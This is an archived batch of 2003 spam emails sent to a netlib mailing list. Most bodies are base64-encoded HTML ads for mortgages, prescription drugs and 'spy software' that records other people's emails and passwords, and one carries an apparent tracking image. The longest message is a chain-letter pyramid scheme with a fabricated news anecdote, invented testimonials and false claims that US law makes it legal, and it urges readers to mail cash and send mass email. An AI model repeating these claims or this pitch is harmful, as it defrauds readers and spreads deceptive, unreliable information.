From GARRETAITKEN@yahoo.ca Sat Sep 27 17:30:48 2003
Return-Path: <GARRETAITKEN@yahoo.ca>
Received: from DAVID (oh-westernreserve8a-a-40.wre.adelphia.net [68.169.78.40])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h8RLUlRY015400
	for <blast-funct-archive@netlib2.cs.utk.edu>; Sat, 27 Sep 2003 17:30:47 -0400 (EDT)
Message-Id: <200309272130.h8RLUlRY015400@netlib2.cs.utk.edu>
From: "Jacob" <GARRETAITKEN@yahoo.ca>
To: "blast-funct-archive@netlib2.cs.utk.edu" <blast-funct-archive@netlib2.cs.utk.edu>
Subject: a few moments?                         ...,vcxn
Date: Sat, 27 Sep 2003 15:04:49 -0400
X-Priority: 3 (normal)
Importance: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
MIME-Version: 1.0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: base64

DQpIaSw8YnI+DQpIZXJlPCFuOHVmNDk0ajg+IGlzIHRoZSB3ZWI8IWJ5YTRza2JmPnNpdGUgeW91
IHdhbnRlZCB3aGVyZSB5b3UgY2FuIGdldCBhIHM8IWRsMWFoZzdmPnVwZXIgbG93PGJyPnJhPCE4
dG8xNDMxMmd5ND50ZSBvbiB5b3VyIG1vcjwhcHVtcGtpbj50Z2FnZS48YnI+DQo8YSBocmVmPSJo
dHRwOi8vd3d3LnN1cGVybG93cmF0ZXMubmV0LzIvaW5kZXguaHRtIj4gV2Vic2l0ZSBpcyBoZXJl
ITwvYT48YnI+DQpUaGFuayB5b3UsPGJyPg0KRnJhbmsgPCFsYXM0aGQ3PkJlbmVkaWN0PGJyPg0K
PGJyPg0KPGJyPg0KPGltZyBzcmM9Imh0dHA6Ly9zdXBwb3J0LnJhcGlkc2l0ZS5mci9jZ2ktYmlu
L25ld2NvdW50L2NnaS1iaW4vbmV3Y291bnQ/bW9yJndpZHRoPTYmZm9udD1kaWdpdGFsJm5vc2hv
dyI+DQo=


From bbelle@gte.net Sun Sep 28 11:20:36 2003
Return-Path: <bbelle@gte.net>
Received: from SYSTECH (dsl-olugw3maa.dial.inet.fi [80.223.172.170])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h8SFKZRY002697
	for <blast-funct-archive@netlib2.cs.utk.edu>; Sun, 28 Sep 2003 11:20:36 -0400 (EDT)
Message-Id: <200309281520.h8SFKZRY002697@netlib2.cs.utk.edu>
From: "qwerty" <bbelle@gte.net>
To: "blast-funct-archive@netlib2.cs.utk.edu" <blast-funct-archive@netlib2.cs.utk.edu>
Subject: Don't let her get away with cheating on you
Date: Sun, 28 Sep 2003 18:20:32 +0300
X-Priority: 3 (normal)
Importance: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
MIME-Version: 1.0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: base64

PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMDEgVHJhbnNpdGlvbmFs
Ly9FTiI+DQo8aHRtbD4NCjxoZWFkPg0KPHRpdGxlPlVudGl0bGVkIERvY3VtZW50PC90aXRsZT4N
CjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFy
c2V0PWlzby04ODU5LTEiPg0KPC9oZWFkPg0KDQo8Ym9keSBiZ2NvbG9yPSIjMDAzMzAwIiB0ZXh0
PSJ5ZWxsb3ciIGxpbms9IiNDQ0NDQ0MiIHZsaW5rPSIjQ0NDQ0NDIiBhbGluaz0iI0NDQ0NDQyIg
bGVmdG1hcmdpbj0iMCIgdG9wbWFyZ2luPSIwIiBtYXJnaW53aWR0aD0iMCIgbWFyZ2luaGVpZ2h0
PSIwIj4NCjx0YWJsZSB3aWR0aD0iMTAwJSIgYm9yZGVyPSIwIiBhbGlnbj0iY2VudGVyIiBjZWxs
cGFkZGluZz0iMCIgY2VsbHNwYWNpbmc9IjEiPg0KPHRyPg0KPHRkIGFsaWduPSJjZW50ZXIiPjxi
cj48YnI+PGZvbnQgc2l6ZT0iNCIgY29sb3I9IndoaXRlIj48Yj48YnI+T3VyIFNweSBTb2Z0d2Fy
ZSBsZXRzIHlvdSBzcHkgb24gYW55b25lcyBjb21wdXRlciBhbmQgcmVjb3JkIGVtYWlscywgY29u
dmVyc2F0aW9ucyBhbmQgcGFzc3dvcmRzITxicj48QlI+PC90ZD4NCjwvdHI+DQo8dHI+PHRkIGFs
aWduPSJjZW50ZXIiPjxicj48YSBocmVmPSJodHRwOi8vd3d3Lmdvb3RsZS51cy9pbmRleC5waHA/
YWZpbD0xMDM5Ij48Yj48dT5jb21lIHRha2UgYSBsb29rIGF0IGhvdyBjb252ZW5pZW50IGJ1eWlu
ZyB5b3VyIG5leHQgcHJlc2NyaXB0aW9uIGNhbiBiZS48L2E+PGJyPjxicj48L3RkPjwvdHI+DQo8
L3RhYmxlPg0KPC9ib2R5Pg0KPC9odG1sPg0K


From 14lmflf@yahoo.com Tue Sep 30 10:33:12 2003
Return-Path: <14lmflf@yahoo.com>
Received: from 200-140-089-229.cpece7005.dsl.brasiltelecom.net.br (200-140-089-229.cpece7005.dsl.brasiltelecom.net.br [200.140.89.229])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h8UEWwRY002441;
	Tue, 30 Sep 2003 10:33:00 -0400 (EDT)
Message-ID: <9tff1410vhn-8gi8x@g9x00n.yd4m0p>
From: "Nolan Livingston" <14lmflf@yahoo.com>
Reply-To: "Nolan Livingston" <14lmflf@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: SOMA,VIAGRA,MUCH MORE ! elvusg  hmscbznfh
Date: Tue, 30 Sep 2003 21:22:05 -0700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_03963A_2E"


--_03963A_2E
Content-Type: text/html;
Content-Transfer-Encoding: base64

PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMCBUcmFuc2l0aW9u
YWwvL0VOIj4NCjxIVE1MPjxIRUFEPg0KPE1FVEEgaHR0cC1lcXVpdj1Db250ZW50LVR5cGUg
Y29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PWlzby04ODU5LTEiPg0KPE1FVEEgY29udGVu
dD0iTWljcm9zb2Z0IEZyb250UGFnZSA0LjAiIG5hbWU9R0VORVJBVE9SPg0KPFNUWUxFPjwv
U1RZTEU+DQo8L0hFQUQ+DQo8Qk9EWSBiZ0NvbG9yPSNmZmZmZmY+DQo8RElWPg0KPERJVj48
UCBhbGlnbj1jZW50ZXI+PGEgaHJlZj0iaHR0cDovL29zYm9ybmVAZ2V0bW9yZXNhdmVtb3Jl
LmJpei9sLzExNy9pbmRleC5odG0/b2JlbGlzayI+PGI+PHNwYW4gc3R5bGU9InRleHQtdHJh
bnNmb3JtOiB1cHBlcmNhc2U7IGZvbnQtdmFyaWFudDogc21hbGwtY2FwcyI+PGZvbnQgZmFj
ZT0iQXJpYWwiIHNpemU9IjMiPjxmb250IGNvbG9yPSIjRkZGRkZGIj54PC9mb250Pjxmb250
IGNvbG9yPSIjMDAwMGZmIiBzaXplPSI0IiBmYWNlPSJBcmlhbCI+VmFsaXVtPC9mb250Pjxm
b250IHNpemU9IjQiIGZhY2U9IkFyaWFsIiBjb2xvcj0iI0ZGRkZGRiI+dA0KICA8L2ZvbnQ+
PGZvbnQgY29sb3I9IiMwMDAwZmYiIHNpemU9IjQiIGZhY2U9IkFyaWFsIj4gLSA8L2ZvbnQ+
PGZvbnQgY29sb3I9IiNGRkZGRkYiPm88L2ZvbnQ+PC9mb250Pjxmb250IGNvbG9yPSIjMDAw
MEZGIiBmYWNlPSJBcmlhbCIgc2l6ZT0iNCI+Vmljb2Rpbg0KICAtJm5ic3A7IDwvZm9udD48
Zm9udCBmYWNlPSJBcmlhbCIgc2l6ZT0iMyI+PGZvbnQgY29sb3I9IiNGRkZGRkYiPk88L2Zv
bnQ+PGZvbnQgY29sb3I9IiMwMDAwZmYiIHNpemU9IjQiIGZhY2U9IkFyaWFsIj5WaWFncmE8
L2ZvbnQ+PGZvbnQgc2l6ZT0iNCIgZmFjZT0iQXJpYWwiIGNvbG9yPSIjRkZGRkZGIj5wPC9m
b250Pjxmb250IGNvbG9yPSIjMDAwMGZmIiBzaXplPSI0IiBmYWNlPSJBcmlhbCI+IC0NCiAg
PC9mb250Pjxmb250IHNpemU9IjQiIGZhY2U9IkFyaWFsIiBjb2xvcj0iI0ZGRkZGRiI+bjwv
Zm9udD48Zm9udCBjb2xvcj0iIzAwMDBmZiIgc2l6ZT0iNCIgZmFjZT0iQXJpYWwiPlhhbmF4
PC9mb250Pjxmb250IHNpemU9IjQiIGZhY2U9IkFyaWFsIiBjb2xvcj0iI0ZGRkZGRiI+ag0K
ICA8L2ZvbnQ+PGZvbnQgY29sb3I9IiMwMDAwZmYiIHNpemU9IjQiIGZhY2U9IkFyaWFsIj4g
LSA8L2ZvbnQ+PGZvbnQgc2l6ZT0iNCIgZmFjZT0iQXJpYWwiIGNvbG9yPSIjRkZGRkZGIj5r
PC9mb250Pjxmb250IGNvbG9yPSIjMDAwMGZmIiBzaXplPSI0IiBmYWNlPSJBcmlhbCI+QW1i
aWVuPC9mb250Pjxmb250IGNvbG9yPSIjRkZGRkZGIj5iPC9mb250PjwvZm9udD48L3NwYW4+
PC9iPjwvYT48L1A+DQo8UCBhbGlnbj1jZW50ZXI+PEZPTlQgZmFjZT1BcmlhbCBzaXplPTI+
LU1BTlkgTU9SRS08QlI+PEJSPjxCPk5vIFBoeXNpY2FsIEV4YW0gTmVlZGVkITwvQj48QlI+
PEJSPlNpbXBsZSANCk9ubGluZSBGb3JtPC9GT05UPjwvUD4NCiAgPEZPTlQgZmFjZT1Bcmlh
bCBzaXplPTI+DQo8UCBhbGlnbj1jZW50ZXI+Jm5ic3A7PC9QPg0KPFAgYWxpZ249Y2VudGVy
PiZuYnNwOzwvUD4NCjxQIGFsaWduPWNlbnRlcj4mbmJzcDs8L1A+DQo8L0ZPTlQ+PFAgYWxp
Z249Y2VudGVyPjxGT05UIHNpemU9MSBmYWNlPSJBcmlhbCI+PFU+PGEgaHJlZj0iaHR0cDov
L2plc3VzQGdldG1vcmVzYXZlbW9yZS5iaXovb3B0b3V0Lmh0bWw/cHJlc3VtcHRpdmUiPjxG
T05UIA0KY29sb3I9IzAwMDBmZj5zYW5hdG9yaWFOT01PUkVNQUlMPC9GT05UPjwvYT48L1U+
PC9GT05UPjwvUD4NCiAgPC9ESVY+DQo8L0RJVj48L0JPRFk+PC9IVE1MPmZ0YyBkbHUNCmd6
Y3ZrZ2dncmJvIGkNCmdpb2ppIGFyIHl2eW90ICB6eSAgZG5ubWFuYm1ha3hrZyAgIHYgIGl2
ZHUgd21iYWtuZw==



--_03963A_2E--


From fiqax1bfq@yrd.stanley.co.jp Tue Sep 30 18:46:58 2003
Return-Path: <fiqax1bfq@yrd.stanley.co.jp>
Received: from adsl-65-71-245-161.dsl.rcsntx.swbell.net (adsl-65-71-245-161.dsl.rcsntx.swbell.net [65.71.245.161])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h8UMjdRY012332;
	Tue, 30 Sep 2003 18:45:48 -0400 (EDT)
Received: from (HELO rpyq) [49.248.129.113] by adsl-65-71-245-161.dsl.rcsntx.swbell.net; Wed, 01 Oct 2003 13:39:51 +0200
Message-ID: <ix9n-t$---$$9$3rj@8654g.y.9a.ede>
From: "Ruthie Read" <fiqax1bfq@yrd.stanley.co.jp>
Reply-To: "Ruthie Read" <fiqax1bfq@yrd.stanley.co.jp>
To: <blast-comm-archive@netlib2.cs.utk.edu>,
   <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>,
   <blast-parallel-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>, <netlibd@netlib2.cs.utk.edu>
Subject: YOUR SUCCESS GUIDELINES zybdgdjtvlpift
Date: Wed, 01 Oct 03 13:39:51 GMT
X-Mailer: Internet Mail Service (5.5.2650.21)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="76_AE4_8F8C8_A632B7.E6D7"
X-Priority: 3
X-MSMail-Priority: Normal


--76_AE4_8F8C8_A632B7.E6D7
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
   <meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8=
859-1">
   <meta name=3D"GENERATOR" content=3D"Mozilla/4.77 [en] (Windows NT 5.0; =
U) [Netscape]">
   <title>francisco</title>
</head>
<body>
<font face=3D"Times New Roman,Times"><font color=3D"#FF0000">This
is not a hoax, and I sincerely suggest you take the time to read on.</font=
></font>
<p><font face=3D"Times New Roman,Times">DO NOT DELETE THIS - READ FIRST -
IT WILL CHANGE YOUR LIFE!</font>
<br><font face=3D"Times New Roman,Times">This Really Works!</font>
<br><font face=3D"Times New Roman,Times">Give Your Future Five Minutes and=

Read This Email</font>
<br><font face=3D"Times New Roman,Times">It Will Change Your Life!</font>
<br><font face=3D"Times New Roman,Times">A One Time Investment of $25 plus=

=FFFFFF93This Simple Technology=FFFFFF94</font>
<br><font face=3D"Times New Roman,Times">Could Make You Financially Secure=

For Life!</font>
<br><font face=3D"Times New Roman,Times">Just Because This Is Easy doesn't=

mean it's not Honest, or Real Business. Keep</font>
<br><font face=3D"Times New Roman,Times">Working Hard or Learn to Work Sma=
rt.
What do you think Successful People Do?</font>
<br><font face=3D"Times New Roman,Times">This is a completely documented
method to Get Wealthy and Anyone regardless of Age, Race, State of Health,=

Country of origin, or Financial Standing can participate. No Education
or Special Experience is needed. Within the next two weeks you could be
well on your way to a $500,000.00 income. Imagine being able to make over
a half million dollars every 4 to 5 months from your home.</font>
<br><font face=3D"Times New Roman,Times">THANK'S TO THE COMPUTER AGE AND
THE INTERNET AS SEEN ON NATIONAL TV:</font>
<p><font face=3D"Times New Roman,Times"><font color=3D"#FF0000">The follow=
ing
was originally presented as a true occurrence, however after checking the
authenticity it is only an example of what can take place</font>.</font>
<p><font face=3D"Times New Roman,Times">PARENTS OF 15 - YEAR OLD - FIND $7=
1,000
CASH HIDDEN IN HIS CLOSET!</font>
<br><font face=3D"Times New Roman,Times">Does this headline look familiar?=

Of course it does. You most likely have just seen this story recently feat=
ured
on a major nightly news program (USA). And reported elsewhere in the world=
.
His mother was cleaning and putting laundry away when she came across a
large brown paper bag that was suspiciously buried beneath some clothes
and a skateboard in the back of her 15-year-old sons closet. Nothing could=

have prepared her for the shock she got when she opened the bag and found
it was full of cash. Five-Dollar Bills, Twenties, Fifties and Hundreds
- all neatly rubber-banded in labeled piles. "My first thought was that
he had robbed a bank", says the 41-year-old woman, "There was over $71,000=

Dollars in that bag -- that's more than my husband earns in a year".</font=
>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">The mother immediately called her=

husband at the car-dealership where he worked to tell him what she had
discovered. He came home right away, and they drove together to the boys
school, and picked him up. Little did they suspect that where the money
came from, was more shocking than actually finding it in the closet.</font=
>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">As it turns out, the boy had been=

sending out, via E-mail, a type of "Report" to E-mail addresses that he
obtained off the Internet. Everyday after school for the past 2 months,
he had been doing this right on his computer in his bedroom.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">"I just got the E-mail one day an=
d
I figured what the heck, I put my name on it like the instructions said
and I started sending it out", says the clever 15-year-old.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">The E-mail letter listed 5 addres=
ses
and contained instructions to send one $5 dollar bill to each person on
the list, then delete the address at the bottom and move the others addres=
ses
Down , and finally to add your name to the top of the list.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">The letter goes on to state that
you would receive Several Thousand Dollars in Five-Dollar Bills within
2 weeks if you sent out the letter with your name at the top of the 5-addr=
ess
list. "I get junk E-mail all the time, and really did not think it was
going to work", the boy continues.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">Within the first few days of send=
ing
out the E-mail, the Post Office Box that his parents had gotten him for
his video-game magazine subscriptions began to fill up with not with magaz=
ines,
but envelopes containing $5 Bills.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">"About a week later I rode [my bi=
ke]
down to the post office and my box had 1 magazine and about 300 envelops
stuffed in it. There was also a yellow slip that said I had to go up to
the [post office] counter. I thought I was in trouble or something (laughs=
)".
He goes on, "I went up to the counter and they had a whole box of more
mail for me. I had to ride back home and empty out my backpack because
I could not carry it all". Over the next few weeks, the boy continued send=
ing
out the E-mail. "The money just kept coming in and I just kept sorting
it and stashing it in the closet, barely had time for my homework" .He
had also been riding his bike to several of the banks in his area and exch=
anging
the $5 bills for twenties, fifties and hundreds.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">"I didn't want the banks to get
suspicious so I kept riding to different banks with like five thousand
at a time in my backpack. I would usually tell the lady at the bank counte=
r
that my dad had sent me in to exchange the money and he was outside waitin=
g
for me. One time the lady gave me a really strange look and told me that
she would not be able to do it for me and my dad would have to come in
and do it, but I just rode to the next bank down the street (laughs)."
Surprisingly, the boy did not have any reason to be afraid. The reporting
news team examined and investigated the so-called "chain-letter" the boy
was sending out and found that it was not a chain-letter at all. In fact,
it was completely legal according to US Postal and Lottery Laws, Title
18, Section 1302 and 1341, or Title 18, Section 3005 in the US code, also
in the code of federal regulations, Volume 16, Sections 255 and 436, which=

state a product or service must be exchanged for! money received.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">Every five-dollar bill that he re=
ceived
contained a little note that read, "Please send me report number XYX".
This simple note made the letter legal because he was exchanging a service=

(A Report on how-to) for a five-dollar fee.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times"><font color=3D"#FF0000">[This is =
the
end of the example. If you would like to understand how the system works
and get your $71,000 plus - please continue reading. What appears below
is what the 15 year old was sending out on the net - YOU CAN USE IT TOO
- just follow the simple instructions]</font></font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">BE AN INTERNET MILLIONAIRE LIKE
OTHERS WITHIN A YEAR!!!</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">Before you say ''Bull'', please
read the following. This is the letter you have been hearing about on the
news lately. Due to the popularity of this letter on the Internet, a natio=
nal
weekly news program recently devoted an entire show to the investigation
of this program described below, to see if it really can make people money=
.
The show also investigated whether or not the program was legal.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">Their findings proved once and fo=
r
all that there are ''absolutely NO Laws prohibiting the participation in
the program and if people can "follow the simple instruction" they are
bound to make some mega bucks with only $25 out of pocket cost''.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">DUE TO THE RECENT INCREASE OF POP=
ULARITY
&amp; RESPECT THIS PROGRAM HAS ATTAINED, IT IS CURRENTLY WORKING BETTER
THAN EVER.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">This is what one had to say:</fon=
t>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">''Thanks to this profitable oppor=
tunity".
I was approached many times before but each time I passed on it. I am so
glad I finally joined just to see what one could expect in return for the
minimal effort and money required. To my astonishment, I received a total
$ 610,470.00 in 21 weeks, with money still coming in''.</font>
<br><font face=3D"Times New Roman,Times">Pam Hedland</font>
<br><font face=3D"Times New Roman,Times">Fort Lee, New Jersey.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">_________________________________=
____________________________________________________</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">Another said:</font>
<br><font face=3D"Times New Roman,Times">"This program has been around for=

a long time but I never believed in it. But one day when I received this
again in the mail I decided to gamble my $25 on it. I followed the simple
instructions and Wa-laa ..... 3 weeks later the money started to come in.
First month I only made $240.00 but the next 2 months after that I made
a total of $290,000.00. So far, in the past 8 months by re-entering the
program, I have made over $710,000.00 and I am playing it again. The key
to success in this program is to follow the simple steps and NOT change
anything."</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">More testimonials later but first=
..</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">PRINT THIS NOW FOR YOUR FUTURE RE=
FERENCE</font>
<br><font face=3D"Times New Roman,Times">_________________________________=
____________________________________________________</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">If you would like to make at leas=
t
$500,000 every 4 to 5 months easily and</font>
<br><font face=3D"Times New Roman,Times">comfortably, please read the foll=
owing...THEN
READ IT AGAIN and AGAIN !!!</font>
<br><font face=3D"Times New Roman,Times">_________________________________=
____________________________________________________</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">FOLLOW THE SIMPLE INSTRUCTIONS BE=
LOW</font>
<br><font face=3D"Times New Roman,Times">AND YOUR FINANCIAL DREAMS WILL CO=
ME
TRUE!</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">INSTRUCTIONS:</font>
<br><font face=3D"Times New Roman,Times">For each report, send $5 CASH, TO=

THE NAME &amp; NUMBER OF THE REPORT YOU ARE ORDERING and YOUR E-MAIL ADDRE=
SS
to the person whose name appears ON THAT LIST next to the report. MAKE
SURE YOUR RETURN ADDRESS IS ON YOUR ENVELOPE TOP LEFT CORNER in case of
any mail problems, and your e-mail address (can't send you anything withou=
t
an email address). <font color=3D"#FF0000">Be sure all listings are printe=
d
and readable.</font></font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">WHEN YOU PLACE YOUR ORDER,</font>=

<br><font face=3D"Times New Roman,Times">MAKE SURE YOU ORDER EACH OF THE
5 REPORTS!</font>
<br><font face=3D"Times New Roman,Times">You will need all 5 reports so th=
at
you can save them on your computer and resell them.</font>
<br><font face=3D"Times New Roman,Times">YOUR TOTAL COST $5 X 5 =3D $25.00=
</font>
<br><font face=3D"Times New Roman,Times">(That's what I spend every time
I take my girlfriend to the movies)</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">Within a few days you will receiv=
e,
via e-mail, each of the 5 reports from these 5 different individuals below=
.
Save them on your computer so they will be accessible for you to send to
the 1,000's of people who will order them from you. Also make a floppy
of these reports and keep it in your desk in case something happens to
your computer.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">IMPORTANT:</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">DO NOT alter the names of the peo=
ple
who are listed next to each report, or their sequence on the list, in any
way other than what is instructed below in step '' 1 through 6 '' or you
will loose out on the majority of your profits. Once you understand the
way this works, you will also see how it does not work if you change it.
Remember, this method has been tested, and if you alter it, it will NOT
work !!! People have tried to put their friends/relatives names on all
five thinking they could get all the money. But it does not work this way.=

Believe us, some have tried to be greedy and then nothing happened. So
Do Not try to change anything other than what is instructed. Because if
you do, it will not work for you. Remember, Honesty Reaps The Reward!!!</f=
ont>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">This IS a legitimate BUSINESS. Yo=
u
are offering</font>
<br><font face=3D"Times New Roman,Times">a product for sale and getting pa=
id
for it.</font>
<br><font face=3D"Times New Roman,Times">Treat it as such and you will be
VERY profitable in a short period of time</font>
<br><font face=3D"Times New Roman,Times">After you have ordered all 5 repo=
rts,
take this advertisement (copy or forward) and REMOVE the name &amp; addres=
s
of the person in REPORT # 5. (Person (#5) has made it through the cycle
and is no doubt counting their fortune. Heck, e-mail them and asked how
much they collected?)</font>
<br><font face=3D"Times New Roman,Times">Move the name &amp; address in RE=
PORT
# 4 down TO REPORT # 5.</font>
<br><font face=3D"Times New Roman,Times">Move the name &amp; address in RE=
PORT
# 3 down TO REPORT # 4.</font>
<br><font face=3D"Times New Roman,Times">Move the name &amp; address in RE=
PORT
# 2 down TO REPORT # 3.</font>
<br><font face=3D"Times New Roman,Times">Move the name &amp; address in RE=
PORT
# 1 down TO REPORT # 2.</font>
<br><font face=3D"Times New Roman,Times">Insert YOUR name &amp; address in=

the REPORT # 1 Position.</font>
<br><font face=3D"Times New Roman,Times">PLEASE MAKE SURE you copy every
name &amp; address ACCURATELY</font>
<br><font face=3D"Times New Roman,Times">(Just cut and paste! This is crit=
ical
to YOUR success.</font>
<br><font face=3D"Times New Roman,Times">Take this entire letter, with the=

modified list of names, and save it on your computer.</font>
<br><font face=3D"Times New Roman,Times">DO NOT MAKE ANY OTHER CHANGES</fo=
nt>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">Save this on a disk as well just
in case if you loose any data. To assist you with marketing your business
on the internet, the 5 reports you purchase will provide you with invaluab=
le
marketing information which includes how to send bulk e-mails legally,
where to find thousands of free classified ads and much more. There are
2 Primary methods to get this venture going:</font>
<br><font face=3D"Times New Roman,Times">METHOD # 1: BY SENDING BULK E-MAI=
L
LEGALLY</font>
<br><font face=3D"Times New Roman,Times">Let's say that you decide to star=
t
small, just to see how it goes, and we will assume You and those involved
send out only 5,000 e-mails each. Let's also assume that the mailing recei=
ves
only a 0.2% (2/10 of 1%) response (the response could be much better but
lets just say it is only 0.2%). Also many people will send out hundreds
of thousands e-mails instead of only 5,000 each). Continuing with this
example, you send out only 5,000 e-mails.</font>
<br><font face=3D"Times New Roman,Times">With a 0.2% response, that is onl=
y
10 orders for report # 1. Those 10 people responded by sending out 5,000
e-mail each for a total of 50,000. Out of those 50,000 e-mails only 0.2=
%
responded with orders. That's =3D 100 people responded and ordered Report
# 2.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">Those 100 people mail out 5,000
e-mails each for a total of 500,000 e-mails. The 0.2% response to that
is 1000 orders for Report # 3.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">Those 1000 people send 5,000 e-ma=
il
each for a total of 5 million e-mail sent out. The 0.2% response is 10,000=

orders for Report # 4.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">Those 10,000 people send out 5,00=
0
e-mails each for a total of 50,000,000 (50 million) e-mails. The 0.2=
% response
to that is 100,000 orders for Report # 5.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">THAT'S 100,000 ORDERS TIMES $5 EA=
CH
=3D $500,000.00 (half a million dollars).</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">Your total income in this example=

is: 1... $50 + 2..... $500 + 3..... $5,000 + 4..... $50,000 + 5....$500,00=
0
... Grand Total=3D$555,550.00</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">>>> NUMBERS DO NOT LIE &lt;&lt;&l=
t;</font>
<br><font face=3D"Times New Roman,Times">GET A PENCIL &amp; PAPER AND FIGU=
RE
OUT THE WORST POSSIBLE RESPONSES AND NO MATTER HOW YOU CALCULATE IT, YOU
WILL STILL MAKE A LOT OF MONEY! REMEMBER, THIS IS ASSUMING ONLY 10 PEOPLE
ORDERING OUT OF 5,000 YOU MAILED TO. Dare to think for a moment what would=

happen if everyone or half or even one 4th of those people mailed 100,000
e-mails each or more? There are 580.78 million people on the Internet worl=
dwide
and counting, with thousands of more coming on line every day.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">Believe me, there isn't any bette=
r
way to make money!</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">METHOD # 2: BY PLACING FREE ADS
ON THE INTERNET</font>
<br><font face=3D"Times New Roman,Times">Advertising on the net is very,
very inexpensive and there are hundreds of FREE places to advertise. Placi=
ng
a lot of free ads on the Internet will easily get a larger response. We
strongly suggest you start with Method # 1 and add METHOD #2 as you go
along. For every $5 you receive, all you must do is e-mail them the Report=

they ordered. That's it. Always provide same day service on all orders.</f=
ont>
<br><font face=3D"Times New Roman,Times">This will guarantee that the e-ma=
il
they send out, with your name and address on it, will be prompt because
they can not advertise until they receive the report.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">The reason for the "cash" is not
because this is illegal or somehow "wrong". It is simply about time. Time
for checks or credit cards to be cleared or approved, etc. Concealing it
is simply so no one can SEE there is money in the envelope and steal it
before it gets to you.</font>
